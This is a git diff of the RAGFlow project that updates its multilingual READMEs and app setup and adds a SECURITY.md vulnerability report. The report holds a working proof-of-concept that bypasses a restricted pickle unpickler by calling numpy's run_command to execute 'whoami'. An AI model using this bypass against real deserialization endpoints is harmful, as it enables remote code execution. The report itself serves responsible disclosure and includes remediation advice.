# Adjust configurations according to your actual situation (the following two export commands are newly added):
|
||||
# - Assign the result of `which python` to `PY`.
|
||||
# - Assign the result of `pwd` to `PYTHONPATH`.
|
||||
# - Comment out `LD_LIBRARY_PATH`, if it is configured.
|
||||
# - Optional: Add Hugging Face mirror.
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
|
||||
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. Check the configuration files, ensuring that:
|
||||
|
||||
- The settings in **docker/.env** match those in **conf/service_conf.yaml**.
|
||||
- The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
|
||||
|
||||
6. Launch the RAGFlow backend service:
|
||||
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
7. Launch the frontend service:
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# Update proxy.target to http://127.0.0.1:9380
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
8. Deploy the frontend service:
|
||||
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ umi build
|
||||
$ mkdir -p /ragflow/web
|
||||
$ cp -r dist /ragflow/web
|
||||
$ apt install nginx -y
|
||||
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
||||
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
||||
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
||||
$ systemctl start nginx
|
||||
```
|
||||
|
||||
## 📚 Documentation
|
||||
|
||||
- [FAQ](./docs/faq.md)
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 Roadmap
|
||||
|
||||
@ -191,7 +334,8 @@ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 Contributing
|
||||
|
||||
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.
|
||||
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
|
||||
|
||||
133
README_ja.md
133
README_ja.md
@ -11,19 +11,49 @@
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v1.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.2.0"></a>
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.8.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
## 💡 RAGFlow とは?
|
||||
|
||||
[RAGFlow](https://demo.ragflow.io) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
||||
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
||||
|
||||
## 🎮 Demo
|
||||
|
||||
デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 📌 最新情報
|
||||
- 2024-07-08 [Graph](./graph/README.md) に対応しました。.
|
||||
- 2024-06-27 Q&A解析方式はMarkdownファイルとDocxファイルをサポートしています。Docxファイルからの画像の抽出をサポートします。Markdownファイルからテーブルを抽出することをサポートします。
|
||||
- 2024-06-14 Q&A 解析メソッドは PDF ファイルをサポートしています。
|
||||
- 2024-06-06 会話設定でデフォルトでチェックされている [Self-RAG](https://huggingface.co/papers/2310.11511) をサポートします。
|
||||
- 2024-05-30 [BCE](https://github.com/netease-youdao/BCEmbedding) 、[BGE](https://github.com/FlagOpen/FlagEmbedding) reranker を統合。
|
||||
- 2024-05-28 LLM BaichuanとVolcanoArkを統合しました。
|
||||
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
|
||||
- 2024-05-21 ストリーミング出力とテキストチャンク取得APIをサポート。
|
||||
- 2024-05-15 OpenAI GPT-4oを統合しました。
|
||||
|
||||
## 🌟 主な特徴
|
||||
|
||||
@ -53,15 +83,6 @@
|
||||
- 複数の想起と融合された再ランク付け。
|
||||
- 直感的な API によってビジネスとの統合がシームレスに。
|
||||
|
||||
## 📌 最新の機能
|
||||
|
||||
- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
|
||||
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
|
||||
- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/xinference.md) をサポートします。
|
||||
- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
|
||||
- 2024-04-08 [Ollama](./docs/ollama.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
|
||||
- 2024-04-07 中国語インターフェースをサポートします。
|
||||
|
||||
## 🔎 システム構成
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
@ -72,14 +93,15 @@
|
||||
|
||||
### 📝 必要条件
|
||||
|
||||
- CPU >= 2 cores
|
||||
- RAM >= 8 GB
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
|
||||
|
||||
### 🚀 サーバーを起動
|
||||
|
||||
1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/max_map_count.md)】:
|
||||
1. `vm.max_map_count` >= 262144 であることを確認する:
|
||||
|
||||
> `vm.max_map_count` の値をチェックするには:
|
||||
>
|
||||
@ -114,7 +136,9 @@
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
> コアイメージのサイズは約 15 GB で、ロードに時間がかかる場合があります。
|
||||
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.8.0として、上記のコマンドを実行してください。
|
||||
|
||||
> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
|
||||
|
||||
4. サーバーを立ち上げた後、サーバーの状態を確認する:
|
||||
|
||||
@ -137,12 +161,13 @@
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
|
||||
|
||||
5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
|
||||
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
|
||||
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
|
||||
|
||||
> 詳しくは [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) を参照してください。
|
||||
> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
|
||||
|
||||
_これで初期設定完了!ショーの開幕です!_
|
||||
|
||||
@ -173,15 +198,78 @@
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.2.0 .
|
||||
$ docker build -t infiniflow/ragflow:v0.8.0 .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
## 🛠️ ソースコードからサービスを起動する方法
|
||||
|
||||
ソースコードからサービスを起動する場合は、以下の手順に従ってください:
|
||||
|
||||
1. リポジトリをクローンします
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
|
||||
```bash
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. エントリースクリプトをコピーし、環境変数を設定します
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
以下のコマンドでPythonのパスとragflowプロジェクトのパスを取得します:
|
||||
```bash
|
||||
$ which python
|
||||
$ pwd
|
||||
```
|
||||
|
||||
`which python`の出力を`PY`の値として、`pwd`の出力を`PYTHONPATH`の値として設定します。
|
||||
|
||||
`LD_LIBRARY_PATH`が既に設定されている場合は、コメントアウトできます。
|
||||
|
||||
```bash
|
||||
# 実際の状況に応じて設定を調整してください。以下の二つのexportは新たに追加された設定です
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
# オプション:Hugging Faceミラーを追加
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. 基本サービスを起動します
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. 設定ファイルを確認します
|
||||
**docker/.env**内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
|
||||
|
||||
6. サービスを起動します
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
## 📚 ドキュメンテーション
|
||||
|
||||
- [FAQ](./docs/faq.md)
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 ロードマップ
|
||||
|
||||
@ -191,7 +279,8 @@ $ docker compose up -d
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 コントリビュート
|
||||
|
||||
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md)をご覧ください。
|
||||
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。
|
||||
|
||||
156
README_zh.md
156
README_zh.md
@ -11,19 +11,49 @@
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v1.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.2.0"></a>
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
## 💡 RAGFlow 是什么?
|
||||
|
||||
[RAGFlow](https://demo.ragflow.io) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
||||
[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
||||
|
||||
## 🎮 Demo 试用
|
||||
|
||||
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 📌 近期更新
|
||||
|
||||
- 2024-07-08 支持 [Graph](./graph/README.md)。
|
||||
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件。支持提取出 Docx 文件中的图片。支持提取出 Markdown 文件中的表格。
|
||||
- 2024-06-14 Q&A 解析方式支持 PDF 文件。
|
||||
- 2024-06-06 支持 [Self-RAG](https://huggingface.co/papers/2310.11511) ,在对话设置里面默认勾选。
|
||||
- 2024-05-30 集成 [BCE](https://github.com/netease-youdao/BCEmbedding) 和 [BGE](https://github.com/FlagOpen/FlagEmbedding) 重排序模型。
|
||||
- 2024-05-28 集成大模型 Baichuan 和火山方舟。
|
||||
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
|
||||
- 2024-05-21 支持流式结果输出和文本块获取API。
|
||||
- 2024-05-15 集成大模型 OpenAI GPT-4o。
|
||||
|
||||
## 🌟 主要功能
|
||||
|
||||
@ -44,7 +74,7 @@
|
||||
|
||||
### 🍔 **兼容各类异构数据源**
|
||||
|
||||
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
|
||||
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
|
||||
|
||||
### 🛀 **全程无忧、自动化的 RAG 工作流**
|
||||
|
||||
@ -53,15 +83,6 @@
|
||||
- 基于多路召回、融合重排序。
|
||||
- 提供易用的 API,可以轻松集成到各类企业系统。
|
||||
|
||||
## 📌 新增功能
|
||||
|
||||
- 2024-04-16 添加嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 。
|
||||
- 2024-04-16 添加 [FastEmbed](https://github.com/qdrant/fastembed) 专为轻型和高速嵌入而设计。
|
||||
- 2024-04-11 支持用 [Xinference](./docs/xinference.md) 本地化部署大模型。
|
||||
- 2024-04-10 为‘Laws’版面分析增加了底层模型。
|
||||
- 2024-04-08 支持用 [Ollama](./docs/ollama.md) 本地化部署大模型。
|
||||
- 2024-04-07 支持中文界面。
|
||||
|
||||
## 🔎 系统架构
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
@ -72,14 +93,15 @@
|
||||
|
||||
### 📝 前提条件
|
||||
|
||||
- CPU >= 2 核
|
||||
- RAM >= 8 GB
|
||||
- CPU >= 4 核
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
|
||||
|
||||
### 🚀 启动服务器
|
||||
|
||||
1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/max_map_count.md)】:
|
||||
1. 确保 `vm.max_map_count` 不小于 262144:
|
||||
|
||||
> 如需确认 `vm.max_map_count` 的大小:
|
||||
>
|
||||
@ -114,7 +136,9 @@
|
||||
$ docker compose -f docker-compose-CN.yml up -d
|
||||
```
|
||||
|
||||
> 核心镜像文件大约 15 GB,可能需要一定时间拉取。请耐心等待。
|
||||
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.8.0,然后运行上述命令。
|
||||
|
||||
> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。
|
||||
|
||||
4. 服务器启动成功后再次确认服务器状态:
|
||||
|
||||
@ -137,12 +161,13 @@
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network anomaly` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
|
||||
|
||||
5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
|
||||
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
|
||||
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
|
||||
|
||||
> 详见 [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md)。
|
||||
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
|
||||
|
||||
_好戏开始,接着奏乐接着舞!_
|
||||
|
||||
@ -173,15 +198,99 @@
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.2.0 .
|
||||
$ docker build -t infiniflow/ragflow:v0.8.0 .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
## 🛠️ 源码启动服务
|
||||
|
||||
如需从源码启动服务,请参考以下步骤:
|
||||
|
||||
1. 克隆仓库
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
如果cuda > 12.0,需额外执行以下命令:
|
||||
```bash
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. 拷贝入口脚本并配置环境变量
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
使用以下命令获取python路径及ragflow项目路径:
|
||||
```bash
|
||||
$ which python
|
||||
$ pwd
|
||||
```
|
||||
|
||||
将上述`which python`的输出作为`PY`的值,将`pwd`的输出作为`PYTHONPATH`的值。
|
||||
|
||||
`LD_LIBRARY_PATH`如果环境已经配置好,可以注释掉。
|
||||
|
||||
```bash
|
||||
# 此处配置需要按照实际情况调整,两个export为新增配置
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
# 可选:添加Hugging Face镜像
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. 启动基础服务
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. 检查配置文件
|
||||
确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。
|
||||
|
||||
6. 启动服务
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
7. 启动WebUI服务
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# 修改proxy.target为http://127.0.0.1:9380
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
8. 部署WebUI服务
|
||||
```bash
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ umi build
|
||||
$ mkdir -p /ragflow/web
|
||||
$ cp -r dist /ragflow/web
|
||||
$ apt install nginx -y
|
||||
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
||||
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
||||
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
||||
$ systemctl start nginx
|
||||
```
|
||||
## 📚 技术文档
|
||||
|
||||
- [FAQ](./docs/faq.md)
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 路线图
|
||||
|
||||
@ -191,10 +300,11 @@ $ docker compose up -d
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 贡献指南
|
||||
|
||||
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) 。
|
||||
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](./docs/references/CONTRIBUTING.md) 。
|
||||
|
||||
## 👥 加入社区
|
||||
|
||||
|
||||
74
SECURITY.md
Normal file
74
SECURITY.md
Normal file
@ -0,0 +1,74 @@
|
||||
# Security Policy
|
||||
|
||||
## Supported Versions
|
||||
|
||||
Use this section to tell people about which versions of your project are
|
||||
currently being supported with security updates.
|
||||
|
||||
| Version | Supported |
|
||||
| ------- | ------------------ |
|
||||
| <=0.7.0 | :white_check_mark: |
|
||||
|
||||
## Reporting a Vulnerability
|
||||
|
||||
### Branch name
|
||||
|
||||
main
|
||||
|
||||
### Actual behavior
|
||||
|
||||
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
|
||||
The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
|
||||
|
||||
|
||||
### Steps to reproduce
|
||||
|
||||
|
||||
**ragflow_patch.py**
|
||||
|
||||
```py
|
||||
import builtins
|
||||
import io
|
||||
import pickle
|
||||
|
||||
safe_module = {
|
||||
'numpy',
|
||||
'rag_flow'
|
||||
}
|
||||
|
||||
|
||||
class RestrictedUnpickler(pickle.Unpickler):
|
||||
def find_class(self, module, name):
|
||||
import importlib
|
||||
if module.split('.')[0] in safe_module:
|
||||
_module = importlib.import_module(module)
|
||||
return getattr(_module, name)
|
||||
# Forbid everything else.
|
||||
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
|
||||
(module, name))
|
||||
|
||||
|
||||
def restricted_loads(src):
|
||||
"""Helper function analogous to pickle.loads()."""
|
||||
return RestrictedUnpickler(io.BytesIO(src)).load()
|
||||
```
|
||||
Then, **PoC.py**
|
||||
```py
|
||||
import pickle
|
||||
from ragflow_patch import restricted_loads
|
||||
class Exploit:
|
||||
def __reduce__(self):
|
||||
import numpy.f2py.diagnose
|
||||
return numpy.f2py.diagnose.run_command, ('whoami', )
|
||||
|
||||
Payload=pickle.dumps(Exploit())
|
||||
restricted_loads(Payload)
|
||||
```
|
||||
**Result**
|
||||

|
||||
|
||||
|
||||
### Additional information
|
||||
|
||||
#### How to prevent?
|
||||
Strictly filter the module and name before calling with getattr function.
|
||||
@ -54,7 +54,7 @@ app.errorhandler(Exception)(server_error_response)
|
||||
#app.config["LOGIN_DISABLED"] = True
|
||||
app.config["SESSION_PERMANENT"] = False
|
||||
app.config["SESSION_TYPE"] = "filesystem"
|
||||
app.config['MAX_CONTENT_LENGTH'] = os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024)
|
||||
app.config['MAX_CONTENT_LENGTH'] = int(os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024))
|
||||
|
||||
Session(app)
|
||||
login_manager = LoginManager()
|
||||
@ -63,12 +63,17 @@ login_manager.init_app(app)
|
||||
|
||||
|
||||
def search_pages_path(pages_dir):
|
||||
return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
|
||||
app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
|
||||
api_path_list = [path for path in pages_dir.glob('*_api.py') if not path.name.startswith('.')]
|
||||
app_path_list.extend(api_path_list)
|
||||
return app_path_list
|
||||
|
||||
|
||||
def register_page(page_path):
|
||||
page_name = page_path.stem.rstrip('_app')
|
||||
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
|
||||
path = f'{page_path}'
|
||||
|
||||
page_name = page_path.stem.rstrip('_api') if "_api" in path else page_path.stem.rstrip('_app')
|
||||
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))
|
||||
|
||||
